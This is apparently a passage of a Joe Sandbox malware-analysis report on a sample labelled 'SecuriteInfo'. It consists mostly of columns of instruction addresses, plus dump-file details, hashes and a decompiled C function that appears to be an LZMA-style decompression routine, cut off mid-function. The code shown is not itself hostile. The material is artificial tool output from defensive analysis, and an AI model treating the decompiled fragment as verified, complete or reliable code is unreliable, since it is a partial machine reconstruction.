                                                              0x00406c86
                                                              0x00406c94
                                                              0x00406c94
                                                              0x00406c98
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c88
                                                              0x00406c88
                                                              0x00406c8b
                                                              0x00406c8c
                                                              0x00406c8c
                                                              0x00000000
                                                              0x00406c88
                                                              0x00406c62
                                                              0x00406c67
                                                              0x00406c67
                                                              0x00406c70
                                                              0x00406c78
                                                              0x00406c7b
                                                              0x00000000
                                                              0x00406c81
                                                              0x00406c81
                                                              0x00000000
                                                              0x00406c81
                                                              0x00000000
                                                              0x00406c9e
                                                              0x00406c9e
                                                              0x00406ca2
                                                              0x0040754e
                                                              0x00000000
                                                              0x0040754e
                                                              0x00406cab
                                                              0x00406cbb
                                                              0x00406cbe
                                                              0x00406cc1
                                                              0x00406cc1
                                                              0x00406cc1
                                                              0x00406cc4
                                                              0x00406cc8
                                                              0x00000000
                                                              0x00000000
                                                              0x00406cca
                                                              0x00406cd0
                                                              0x00406cfa
                                                              0x00406d00
                                                              0x00406d07
                                                              0x00000000
                                                              0x00406d07
                                                              0x00406cd6
                                                              0x00406cd9
                                                              0x00406cde
                                                              0x00406cde
                                                              0x00406ce9
                                                              0x00406cf1
                                                              0x00406cf4
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d39
                                                              0x00406d3f
                                                              0x00406d42
                                                              0x00406d4f
                                                              0x00406d57
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d0e
                                                              0x00406d0e
                                                              0x00406d12
                                                              0x0040755d
                                                              0x00000000
                                                              0x0040755d
                                                              0x00406d1e
                                                              0x00406d29
                                                              0x00406d29
                                                              0x00406d29
                                                              0x00406d2c
                                                              0x00406d2f
                                                              0x00406d32
                                                              0x00406d37
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004073ce
                                                              0x004073ce
                                                              0x004073d4
                                                              0x004073da
                                                              0x004073e0
                                                              0x004073fa
                                                              0x004073fd
                                                              0x00407403
                                                              0x0040740e
                                                              0x00407410
                                                              0x004073e2
                                                              0x004073e2
                                                              0x004073f1
                                                              0x004073f5
                                                              0x004073f5
                                                              0x0040741a
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d5f
                                                              0x00406d61
                                                              0x00406d64
                                                              0x00406dd5
                                                              0x00406dd8
                                                              0x00406ddb
                                                              0x00406de2
                                                              0x00406dec
                                                              0x004073cb
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00000000
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00406d66
                                                              0x00406d6a
                                                              0x00406d6d
                                                              0x00406d6f
                                                              0x00406d72
                                                              0x00406d75
                                                              0x00406d77
                                                              0x00406d7a
                                                              0x00406d7c
                                                              0x00406d81
                                                              0x00406d84
                                                              0x00406d87
                                                              0x00406d8b
                                                              0x00406d92
                                                              0x00406d95
                                                              0x00406d9c
                                                              0x00406da0
                                                              0x00406da8
                                                              0x00406da8
                                                              0x00406da8
                                                              0x00406da2
                                                              0x00406da2
                                                              0x00406da2
                                                              0x00406d97
                                                              0x00406d97
                                                              0x00406d97
                                                              0x00406dac
                                                              0x00406daf
                                                              0x00406dcd
                                                              0x00406dcf
                                                              0x00000000
                                                              0x00406db1
                                                              0x00406db1
                                                              0x00406db4
                                                              0x00406db7
                                                              0x00406dba
                                                              0x00406dbc
                                                              0x00406dbc
                                                              0x00406dbc
                                                              0x00406dbf
                                                              0x00406dc2
                                                              0x00406dc4
                                                              0x00406dc5
                                                              0x00406dc8
                                                              0x00000000
                                                              0x00406dc8
                                                              0x00000000
                                                              0x00406ffe
                                                              0x00407002
                                                              0x00407020
                                                              0x00407023
                                                              0x0040702a
                                                              0x0040702d
                                                              0x00407030
                                                              0x00407033
                                                              0x00407036
                                                              0x00407039
                                                              0x0040703b
                                                              0x00407042
                                                              0x00407043
                                                              0x00407045
                                                              0x00407048
                                                              0x0040704b
                                                              0x0040704e
                                                              0x0040704e
                                                              0x00407053
                                                              0x00000000
                                                              0x00407053
                                                              0x00407004
                                                              0x00407007
                                                              0x0040700a
                                                              0x00407014
                                                              0x004073cb
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00000000
                                                              0x004073cb
                                                              0x00000000
                                                              0x00407068
                                                              0x0040706c
                                                              0x0040708f
                                                              0x00407092
                                                              0x00407095
                                                              0x0040709f
                                                              0x0040706e
                                                              0x0040706e
                                                              0x00407071
                                                              0x00407074
                                                              0x00407077
                                                              0x00407084
                                                              0x00407087
                                                              0x00407087
                                                              0x004073cb
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00000000
                                                              0x004073cb
                                                              0x00000000
                                                              0x004070ab
                                                              0x004070af
                                                              0x00000000
                                                              0x00000000
                                                              0x004070b5
                                                              0x004070b9
                                                              0x00000000
                                                              0x00000000
                                                              0x004070bf
                                                              0x004070c1
                                                              0x004070c5
                                                              0x004070c5
                                                              0x004070c8
                                                              0x004070cc
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00407143
                                                              0x00407147
                                                              0x0040714e
                                                              0x00407151
                                                              0x00407154
                                                              0x00407149
                                                              0x00407149
                                                              0x00407149
                                                              0x00407157
                                                              0x0040715a
                                                              0x00000000
                                                              0x00000000
                                                              0x00407203
                                                              0x00407203
                                                              0x00407207
                                                              0x004075a5
                                                              0x00000000
                                                              0x004075a5
                                                              0x0040720d
                                                              0x00407210
                                                              0x00407213
                                                              0x00407217
                                                              0x0040721a
                                                              0x00407220
                                                              0x00407222
                                                              0x00407222
                                                              0x00407222
                                                              0x00407225
                                                              0x00407228
                                                              0x00000000
                                                              0x00000000
                                                              0x00406df8
                                                              0x00406df8
                                                              0x00406dfc
                                                              0x00407569
                                                              0x00000000
                                                              0x00407569
                                                              0x00406e02
                                                              0x00406e05
                                                              0x00406e08
                                                              0x00406e0c
                                                              0x00406e0f
                                                              0x00406e15
                                                              0x00406e17
                                                              0x00406e17
                                                              0x00406e17
                                                              0x00406e1a
                                                              0x00406e1d
                                                              0x00406e1d
                                                              0x00406e20
                                                              0x00406e23
                                                              0x00000000
                                                              0x00000000
                                                              0x00406e29
                                                              0x00406e2f
                                                              0x00000000
                                                              0x00000000
                                                              0x00406e35
                                                              0x00406e35
                                                              0x00406e39
                                                              0x00406e3c
                                                              0x00406e3f
                                                              0x00406e42
                                                              0x00406e45
                                                              0x00406e46
                                                              0x00406e49
                                                              0x00406e4b
                                                              0x00406e51
                                                              0x00406e54
                                                              0x00406e57
                                                              0x00406e5a
                                                              0x00406e5d
                                                              0x00406e60
                                                              0x00406e63
                                                              0x00406e7f
                                                              0x00406e82
                                                              0x00406e85
                                                              0x00406e88
                                                              0x00406e8f
                                                              0x00406e93
                                                              0x00406e95
                                                              0x00406e99
                                                              0x00406e65
                                                              0x00406e65
                                                              0x00406e69
                                                              0x00406e71
                                                              0x00406e76
                                                              0x00406e78
                                                              0x00406e7a
                                                              0x00406e7a
                                                              0x00406e9c
                                                              0x00406ea3
                                                              0x00406ea6
                                                              0x00000000
                                                              0x00406eac
                                                              0x00000000
                                                              0x00406eac
                                                              0x00000000
                                                              0x00406eb1
                                                              0x00406eb1
                                                              0x00406eb5
                                                              0x00407575
                                                              0x00000000
                                                              0x00407575
                                                              0x00406ebb
                                                              0x00406ebe
                                                              0x00406ec1
                                                              0x00406ec5
                                                              0x00406ec8
                                                              0x00406ece
                                                              0x00406ed0
                                                              0x00406ed0
                                                              0x00406ed0
                                                              0x00406ed3
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406edc
                                                              0x00000000
                                                              0x00000000
                                                              0x00406ede
                                                              0x00406ee1
                                                              0x00406ee4
                                                              0x00406ee7
                                                              0x00406eea
                                                              0x00406eed
                                                              0x00406ef0
                                                              0x00406ef3
                                                              0x00406ef6
                                                              0x00406ef9
                                                              0x00406efc
                                                              0x00406f14
                                                              0x00406f17
                                                              0x00406f1a
                                                              0x00406f1d
                                                              0x00406f1d
                                                              0x00406f20
                                                              0x00406f24
                                                              0x00406f26
                                                              0x00406efe
                                                              0x00406efe
                                                              0x00406f06
                                                              0x00406f0b
                                                              0x00406f0d
                                                              0x00406f0f
                                                              0x00406f0f
                                                              0x00406f29
                                                              0x00406f30
                                                              0x00406f33
                                                              0x00000000
                                                              0x00406f35
                                                              0x00000000
                                                              0x00406f35
                                                              0x00406f33
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f75
                                                              0x00406f75
                                                              0x00406f79
                                                              0x00407581
                                                              0x00000000
                                                              0x00407581
                                                              0x00406f7f
                                                              0x00406f82
                                                              0x00406f85
                                                              0x00406f89
                                                              0x00406f8c
                                                              0x00406f92
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f97
                                                              0x00406f9a
                                                              0x00406f9a
                                                              0x00406fa0
                                                              0x00406f3e
                                                              0x00406f3e
                                                              0x00406f41
                                                              0x00000000
                                                              0x00406f41
                                                              0x00406fa2
                                                              0x00406fa2
                                                              0x00406fa5
                                                              0x00406fa8
                                                              0x00406fab
                                                              0x00406fae
                                                              0x00406fb1
                                                              0x00406fb4
                                                              0x00406fb7
                                                              0x00406fba
                                                              0x00406fbd
                                                              0x00406fc0
                                                              0x00406fd8
                                                              0x00406fdb
                                                              0x00406fde
                                                              0x00406fe1
                                                              0x00406fe1
                                                              0x00406fe4
                                                              0x00406fe8
                                                              0x00406fea
                                                              0x00406fc2
                                                              0x00406fc2
                                                              0x00406fca
                                                              0x00406fcf
                                                              0x00406fd1
                                                              0x00406fd3
                                                              0x00406fd3
                                                              0x00406fed
                                                              0x00406ff4
                                                              0x00406ff7
                                                              0x00000000
                                                              0x00406ff9
                                                              0x00000000
                                                              0x00406ff9
                                                              0x00000000
                                                              0x00407286
                                                              0x00407286
                                                              0x0040728a
                                                              0x004075b1
                                                              0x00000000
                                                              0x004075b1
                                                              0x00407290
                                                              0x00407293
                                                              0x00407296
                                                              0x0040729a
                                                              0x0040729d
                                                              0x004072a3
                                                              0x004072a5
                                                              0x004072a5
                                                              0x004072a5
                                                              0x004072a8
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00407395
                                                              0x00407399
                                                              0x004073bb
                                                              0x004073be
                                                              0x004073c8
                                                              0x004073cb
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00000000
                                                              0x004073cb
                                                              0x004073cb
                                                              0x0040739b
                                                              0x0040739e
                                                              0x004073a2
                                                              0x004073a5
                                                              0x004073a5
                                                              0x004073a8
                                                              0x00000000
                                                              0x00000000
                                                              0x00407452
                                                              0x00407456
                                                              0x00407474
                                                              0x00407474
                                                              0x00407474
                                                              0x0040747b
                                                              0x00407482
                                                              0x00407489
                                                              0x00407489
                                                              0x00000000
                                                              0x00407489
                                                              0x00407458
                                                              0x0040745b
                                                              0x0040745e
                                                              0x00407461
                                                              0x00407468
                                                              0x004073ac
                                                              0x004073ac
                                                              0x004073af
                                                              0x00000000
                                                              0x00000000
                                                              0x00407543
                                                              0x00407546
                                                              0x00407447
                                                              0x00000000
                                                              0x00000000
                                                              0x0040717d
                                                              0x0040717f
                                                              0x00407186
                                                              0x00407187
                                                              0x00407189
                                                              0x0040718c
                                                              0x00000000
                                                              0x00000000
                                                              0x00407194
                                                              0x00407197
                                                              0x0040719a
                                                              0x0040719c
                                                              0x0040719e
                                                              0x0040719e
                                                              0x0040719f
                                                              0x004071a2
                                                              0x004071a9
                                                              0x004071ac
                                                              0x004071ba
                                                              0x00000000
                                                              0x00000000
                                                              0x00407490
                                                              0x00407490
                                                              0x00407493
                                                              0x0040749a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040749f
                                                              0x0040749f
                                                              0x004074a3
                                                              0x004075db
                                                              0x00000000
                                                              0x004075db
                                                              0x004074a9
                                                              0x004074ac
                                                              0x004074af
                                                              0x004074b3
                                                              0x004074b6
                                                              0x004074bc
                                                              0x004074be
                                                              0x004074be
                                                              0x004074be
                                                              0x004074c1
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c7
                                                              0x004074c7
                                                              0x004074cb
                                                              0x0040752b
                                                              0x0040752e
                                                              0x00407533
                                                              0x00407534
                                                              0x00407536
                                                              0x00407538
                                                              0x0040753b
                                                              0x00407447
                                                              0x00407447
                                                              0x00000000
                                                              0x0040744d
                                                              0x00407447
                                                              0x004074cd
                                                              0x004074d3
                                                              0x004074d6
                                                              0x004074d9
                                                              0x004074dc
                                                              0x004074df
                                                              0x004074e2
                                                              0x004074e5
                                                              0x004074e8
                                                              0x004074eb
                                                              0x004074ee
                                                              0x00407507
                                                              0x0040750a
                                                              0x0040750d
                                                              0x00407510
                                                              0x00407514
                                                              0x00407516
                                                              0x00407516
                                                              0x00407517
                                                              0x0040751a
                                                              0x004074f0
                                                              0x004074f0
                                                              0x004074f8
                                                              0x004074fd
                                                              0x004074ff
                                                              0x00407502
                                                              0x00407502
                                                              0x0040751d
                                                              0x00407524
                                                              0x00000000
                                                              0x00407526
                                                              0x00000000
                                                              0x00407526
                                                              0x00000000
                                                              0x004071c2
                                                              0x004071c5
                                                              0x004071fb
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732e
                                                              0x0040732e
                                                              0x00407331
                                                              0x00407333
                                                              0x004075bd
                                                              0x00000000
                                                              0x004075bd
                                                              0x00407339
                                                              0x0040733c
                                                              0x00000000
                                                              0x00000000
                                                              0x00407342
                                                              0x00407346
                                                              0x00407349
                                                              0x00407349
                                                              0x00407349
                                                              0x00000000
                                                              0x00407349
                                                              0x004071c7
                                                              0x004071c9
                                                              0x004071cb
                                                              0x004071cd
                                                              0x004071d0
                                                              0x004071d1
                                                              0x004071d3
                                                              0x004071d5
                                                              0x004071d8
                                                              0x004071db
                                                              0x004071f1
                                                              0x004071f6
                                                              0x0040722e
                                                              0x0040722e
                                                              0x00407232
                                                              0x0040725e
                                                              0x00407260
                                                              0x00407267
                                                              0x0040726a
                                                              0x0040726d
                                                              0x0040726d
                                                              0x00407272
                                                              0x00407272
                                                              0x00407274
                                                              0x00407277
                                                              0x0040727e
                                                              0x00407281
                                                              0x004072ae
                                                              0x004072ae
                                                              0x004072b1
                                                              0x004072b4
                                                              0x00407328
                                                              0x00407328
                                                              0x00407328
                                                              0x00000000
                                                              0x00407328
                                                              0x004072b6
                                                              0x004072bc
                                                              0x004072bf
                                                              0x004072c2
                                                              0x004072c5
                                                              0x004072c8
                                                              0x004072cb
                                                              0x004072ce
                                                              0x004072d1
                                                              0x004072d4
                                                              0x004072d7
                                                              0x004072f0
                                                              0x004072f2
                                                              0x004072f5
                                                              0x004072f6
                                                              0x004072f9
                                                              0x004072fb
                                                              0x004072fe
                                                              0x00407300
                                                              0x00407302
                                                              0x00407305
                                                              0x00407307
                                                              0x0040730a
                                                              0x0040730e
                                                              0x00407310
                                                              0x00407310
                                                              0x00407311
                                                              0x00407314
                                                              0x00407317
                                                              0x004072d9
                                                              0x004072d9
                                                              0x004072e1
                                                              0x004072e6
                                                              0x004072e8
                                                              0x004072eb
                                                              0x004072eb
                                                              0x0040731a
                                                              0x00407321
                                                              0x004072ab
                                                              0x004072ab
                                                              0x004072ab
                                                              0x004072ab
                                                              0x00000000
                                                              0x00407323
                                                              0x00000000
                                                              0x00407323
                                                              0x00407321
                                                              0x00407234
                                                              0x00407237
                                                              0x00407239
                                                              0x0040723c
                                                              0x0040723f
                                                              0x00407242
                                                              0x00407244
                                                              0x00407247
                                                              0x0040724a
                                                              0x0040724a
                                                              0x0040724d
                                                              0x0040724d
                                                              0x00407250
                                                              0x00407257
                                                              0x0040722b
                                                              0x0040722b
                                                              0x0040722b
                                                              0x0040722b
                                                              0x00000000
                                                              0x00407259
                                                              0x00000000
                                                              0x00407259
                                                              0x00407257
                                                              0x004071dd
                                                              0x004071e0
                                                              0x004071e2
                                                              0x004071e5
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f44
                                                              0x00406f44
                                                              0x00406f48
                                                              0x0040758d
                                                              0x00000000
                                                              0x0040758d
                                                              0x00406f4e
                                                              0x00406f51
                                                              0x00406f54
                                                              0x00406f57
                                                              0x00406f5a
                                                              0x00406f5d
                                                              0x00406f60
                                                              0x00406f62
                                                              0x00406f65
                                                              0x00406f68
                                                              0x00406f6b
                                                              0x00406f6d
                                                              0x00406f6d
                                                              0x00406f6d
                                                              0x00000000
                                                              0x00000000
                                                              0x004070cf
                                                              0x004070cf
                                                              0x004070d3
                                                              0x00407599
                                                              0x00000000
                                                              0x00407599
                                                              0x004070d9
                                                              0x004070dc
                                                              0x004070df
                                                              0x004070e2
                                                              0x004070e4
                                                              0x004070e4
                                                              0x004070e4
                                                              0x004070e7
                                                              0x004070ea
                                                              0x004070ed
                                                              0x004070f0
                                                              0x004070f3
                                                              0x004070f6
                                                              0x004070f7
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070fc
                                                              0x004070ff
                                                              0x00407102
                                                              0x00407105
                                                              0x00407105
                                                              0x00407105
                                                              0x00407108
                                                              0x0040710a
                                                              0x0040710a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040734c
                                                              0x0040734c
                                                              0x0040734c
                                                              0x00407350
                                                              0x00000000
                                                              0x00000000
                                                              0x00407356
                                                              0x00407359
                                                              0x0040735c
                                                              0x0040735f
                                                              0x00407361
                                                              0x00407361
                                                              0x00407361
                                                              0x00407364
                                                              0x00407367
                                                              0x0040736a
                                                              0x0040736d
                                                              0x00407370
                                                              0x00407373
                                                              0x00407374
                                                              0x00407376
                                                              0x00407376
                                                              0x00407376
                                                              0x00407379
                                                              0x0040737c
                                                              0x0040737f
                                                              0x00407382
                                                              0x00407385
                                                              0x00407389
                                                              0x0040738b
                                                              0x0040738e
                                                              0x00000000
                                                              0x00407390
                                                              0x0040710d
                                                              0x0040710d
                                                              0x00000000
                                                              0x0040710d
                                                              0x0040738e
                                                              0x004075c3
                                                              0x00000000
                                                              0x00000000
                                                              0x00406bf2
                                                              0x004075fa
                                                              0x004075fa
                                                              0x00000000
                                                              0x004075fa
                                                              0x00407447
                                                              0x004073ce
                                                              0x004073cb
                                                              0x00000000
                                                              0x00407120

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                              • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                              • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                              • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 98%
                                                              			E00407068() {
                                                              				unsigned short _t531;
                                                              				signed int _t532;
                                                              				void _t533;
                                                              				signed int _t534;
                                                              				signed int _t535;
                                                              				signed int _t565;
                                                              				signed int _t568;
                                                              				signed int _t589;
                                                              				signed int* _t606;
                                                              				void* _t613;
                                                              
                                                              				L0:
                                                              				while(1) {
                                                              					L0:
                                                              					if( *(_t613 - 0x40) != 0) {
                                                              						 *(_t613 - 0x84) = 0xa;
                                                              						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                              					} else {
                                                              						 *(__ebp - 0x84) = 9;
                                                              						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                              					}
                                                              					while(1) {
                                                              						 *(_t613 - 0x54) = _t606;
                                                              						while(1) {
                                                              							L133:
                                                              							_t531 =  *_t606;
                                                              							_t589 = _t531 & 0x0000ffff;
                                                              							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                              							if( *(_t613 - 0xc) >= _t565) {
                                                              								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                              								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                              								 *(_t613 - 0x40) = 1;
                                                              								_t532 = _t531 - (_t531 >> 5);
                                                              								 *_t606 = _t532;
                                                              							} else {
                                                              								 *(_t613 - 0x10) = _t565;
                                                              								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                              								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                              							}
                                                              							if( *(_t613 - 0x10) >= 0x1000000) {
                                                              								goto L139;
                                                              							}
                                                              							L137:
                                                              							if( *(_t613 - 0x6c) == 0) {
                                                              								 *(_t613 - 0x88) = 5;
                                                              								L170:
                                                              								_t568 = 0x22;
                                                              								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                              								_t535 = 0;
                                                              								L172:
                                                              								return _t535;
                                                              							}
                                                              							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                              							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                              							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                              							L139:
                                                              							_t533 =  *(_t613 - 0x84);
                                                              							while(1) {
                                                              								 *(_t613 - 0x88) = _t533;
                                                              								while(1) {
                                                              									L1:
                                                              									_t534 =  *(_t613 - 0x88);
                                                              									if(_t534 > 0x1c) {
                                                              										break;
                                                              									}
                                                              									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                              										case 0:
                                                              											if( *(_t613 - 0x6c) == 0) {
                                                              												goto L170;
                                                              											}
                                                              											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                              											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                              											_t534 =  *( *(_t613 - 0x70));
                                                              											if(_t534 > 0xe1) {
                                                              												goto L171;
                                                              											}
                                                              											_t538 = _t534 & 0x000000ff;
                                                              											_push(0x2d);
                                                              											asm("cdq");
                                                              											_pop(_t570);
                                                              											_push(9);
                                                              											_pop(_t571);
                                                              											_t609 = _t538 / _t570;
                                                              											_t540 = _t538 % _t570 & 0x000000ff;
                                                              											asm("cdq");
                                                              											_t604 = _t540 % _t571 & 0x000000ff;
                                                              											 *(_t613 - 0x3c) = _t604;
                                                              											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                              											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                              											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                              											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                              												L10:
                                                              												if(_t612 == 0) {
                                                              													L12:
                                                              													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                              													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                              													goto L15;
                                                              												} else {
                                                              													goto L11;
                                                              												}
                                                              												do {
                                                              													L11:
                                                              													_t612 = _t612 - 1;
                                                              													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                              												} while (_t612 != 0);
                                                              												goto L12;
                                                              											}
                                                              											if( *(_t613 - 4) != 0) {
                                                              												GlobalFree( *(_t613 - 4));
                                                              											}
                                                              											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                              											 *(_t613 - 4) = _t534;
                                                              											if(_t534 == 0) {
                                                              												goto L171;
                                                              											} else {
                                                              												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                              												goto L10;
                                                              											}
                                                              										case 1:
                                                              											L13:
                                                              											__eflags =  *(_t613 - 0x6c);
                                                              											if( *(_t613 - 0x6c) == 0) {
                                                              												 *(_t613 - 0x88) = 1;
                                                              												goto L170;
                                                              											}
                                                              											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                              											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                              											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                              											_t45 = _t613 - 0x48;
                                                              											 *_t45 =  *(_t613 - 0x48) + 1;
                                                              											__eflags =  *_t45;
                                                              											L15:
                                                              											if( *(_t613 - 0x48) < 4) {
                                                              												goto L13;
                                                              											}
                                                              											_t546 =  *(_t613 - 0x40);
                                                              											if(_t546 ==  *(_t613 - 0x74)) {
                                                              												L20:
                                                              												 *(_t613 - 0x48) = 5;
                                                              												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                              												goto L23;
                                                              											}
                                                              											 *(_t613 - 0x74) = _t546;
                                                              											if( *(_t613 - 8) != 0) {
                                                              												GlobalFree( *(_t613 - 8));
                                                              											}
                                                              											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                              											 *(_t613 - 8) = _t534;
                                                              											if(_t534 == 0) {
                                                              												goto L171;
                                                              											} else {
                                                              												goto L20;
                                                              											}
                                                              										case 2:
                                                              											L24:
                                                              											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                              											 *(_t613 - 0x84) = 6;
                                                              											 *(_t613 - 0x4c) = _t553;
                                                              											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                              											 *(_t613 - 0x54) = _t606;
                                                              											goto L133;
                                                              										case 3:
                                                              											L21:
                                                              											__eflags =  *(_t613 - 0x6c);
                                                              											if( *(_t613 - 0x6c) == 0) {
                                                              												 *(_t613 - 0x88) = 3;
                                                              												goto L170;
                                                              											}
                                                              											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                              											_t67 = _t613 - 0x70;
                                                              											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                              											__eflags =  *_t67;
                                                              											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                              											L23:
                                                              											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                              											if( *(_t613 - 0x48) != 0) {
                                                              												goto L21;
                                                              											}
                                                              											goto L24;
                                                              										case 4:
                                                              											L133:
                                                              											_t531 =  *_t606;
                                                              											_t589 = _t531 & 0x0000ffff;
                                                              											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                              											if( *(_t613 - 0xc) >= _t565) {
                                                              												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                              												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                              												 *(_t613 - 0x40) = 1;
                                                              												_t532 = _t531 - (_t531 >> 5);
                                                              												 *_t606 = _t532;
                                                              											} else {
                                                              												 *(_t613 - 0x10) = _t565;
                                                              												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                              												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                              											}
                                                              											if( *(_t613 - 0x10) >= 0x1000000) {
                                                              												goto L139;
                                                              											}
                                                              										case 5:
                                                              											goto L137;
                                                              										case 6:
                                                              											__edx = 0;
                                                              											__eflags =  *(__ebp - 0x40);
                                                              											if( *(__ebp - 0x40) != 0) {
                                                              												__eax =  *(__ebp - 4);
                                                              												__ecx =  *(__ebp - 0x38);
                                                              												 *(__ebp - 0x34) = 1;
                                                              												 *(__ebp - 0x84) = 7;
                                                              												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                              												while(1) {
                                                              													 *(_t613 - 0x54) = _t606;
                                                              													goto L133;
                                                              												}
                                                              											}
                                                              											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                              											__esi =  *(__ebp - 0x60);
                                                              											__cl = 8;
                                                              											__cl = 8 -  *(__ebp - 0x3c);
                                                              											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                              											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                              											__ecx =  *(__ebp - 0x3c);
